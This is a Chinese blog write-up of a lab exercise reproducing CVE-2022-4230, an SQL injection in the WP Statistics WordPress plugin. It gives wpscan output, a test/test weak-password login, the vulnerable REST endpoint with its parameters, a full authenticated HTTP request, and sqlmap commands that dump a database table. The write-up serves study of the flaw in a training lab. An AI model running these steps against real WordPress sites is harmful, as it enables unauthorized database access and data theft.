春秋云镜之CVE-2022-4230 | 风尘孤狼

风尘孤狼

知识型学习记录

0%

春秋云镜之CVE-2022-4230

发表于 更新于 分类于 阅读次数: Valine:
本文字数: 4.7k 阅读时长 ≈ 4 分钟

CVE-2022-4230,wordpress插件漏洞,用wpscan来扫。

image-20240628185752354

靶标介绍

WP Statistics WordPress 插件13.2.9之前的版本不会转义参数,这可能允许经过身份验证的用户执行 SQL 注入攻击。默认情况下,具有管理选项功能 (admin+) 的用户可以使用受影响的功能,但是该插件有一个设置允许低权限用户也可以访问它。

复现

image-20240628185940920

wordpress特征,直接启动kali-wpscan

wpscan --update  //及时更新
wpscan --url http://eci-2zej3sii86mc7jgxocyw.cloudeci1.ichunqiu.com/

扫描结果如下

┌──(kali㉿kali)-[~/桌面]
└─$ wpscan --url http://eci-2zej3sii86mc7jgxocyw.cloudeci1.ichunqiu.com/
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.24
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://eci-2zej3sii86mc7jgxocyw.cloudeci1.ichunqiu.com/ [39.106.135.198]
[+] Started: Fri Jun 28 06:55:51 2024

Interesting Finding(s):

[+] Headers
 | Interesting Entry: X-Powered-By: PHP/7.4.33
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] robots.txt found: http://eci-2zej3sii86mc7jgxocyw.cloudeci1.ichunqiu.com/robots.txt
 | Interesting Entries:
 |  - /wp-admin/
 |  - /wp-admin/admin-ajax.php
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://eci-2zej3sii86mc7jgxocyw.cloudeci1.ichunqiu.com/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://eci-2zej3sii86mc7jgxocyw.cloudeci1.ichunqiu.com/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://eci-2zej3sii86mc7jgxocyw.cloudeci1.ichunqiu.com/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 6.1.7 identified (Outdated, released on 2024-06-24).
 | Found By: Rss Generator (Aggressive Detection)
 |  - http://eci-2zej3sii86mc7jgxocyw.cloudeci1.ichunqiu.com/feed/, <generator>https://wordpress.org/?v=6.1.7</generator>
 |  - http://eci-2zej3sii86mc7jgxocyw.cloudeci1.ichunqiu.com/comments/feed/, <generator>https://wordpress.org/?v=6.1.7</generator>

[i] The main theme could not be detected.

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:12 <========================================> (137 / 137) 100.00% Time: 00:00:12

[i] No Config Backups Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Fri Jun 28 06:56:09 2024
[+] Requests Done: 170
[+] Cached Requests: 5
[+] Data Sent: 54.58 KB
[+] Data Received: 88.426 KB
[+] Memory used: 235.863 MB
[+] Elapsed time: 00:00:17

访问如下地址

http://eci-2zej3sii86mc7jgxocyw.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php?action=rest-nonce

只回显一个0。

访问后台/wp-admin

image-20240628190422886

有提示test,可见用户名应该就是test,通过弱口令test/test成功登录后台

image-20240628190525324

这个时候再去访问上边那个地址,回显是baba35e538,因为需要先登录才行。

image-20240628190754018

然后访问以下地址【 _wpnonce 的值是上面刚刚获取的随机数】

http://eci-2zej3sii86mc7jgxocyw.cloudeci1.ichunqiu.com/wp-json/wp-statistics/v2/metabox?_wpnonce=baba35e538&name=words&search_engine=aaa

回显如下

{
  "no_data": 1
}
image-20240628190902204

带cookie跑sqlmap

GET /wp-json/wp-statistics/v2/metabox?_wpnonce=baba35e538&name=words&search_engine=aaa HTTP/1.1
Host: eci-2zej3sii86mc7jgxocyw.cloudeci1.ichunqiu.com
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_587724cad3c0babb400f526885101154=test%7C1719745494%7CT9pn2w8NyKzD3ZvmmjNfYWpI7KpAWNv7VaJsJ4adeC2%7C01909b0ec7b0102c58453432216f0156f7145645024f65d70f93f32fe2511fc8; wp-settings-time-1=1719572730
Connection: close


python sqlmap.py -r 1.txt --batch -o
image-20240628191305801

时间盲注,得到flag

python sqlmap.py -r 1.txt --batch -o -D wordpress -T flag -dump

结果如下

Database: wordpress
Table: flag
[1 entry]
+--------------------------------------------+
| flag                                       |
+--------------------------------------------+
| flag{af614120-1d87-4542-91af-24684e4d40b4} |
+--------------------------------------------+
image-20240628192120771
制作不易,如若感觉写的不错,欢迎打赏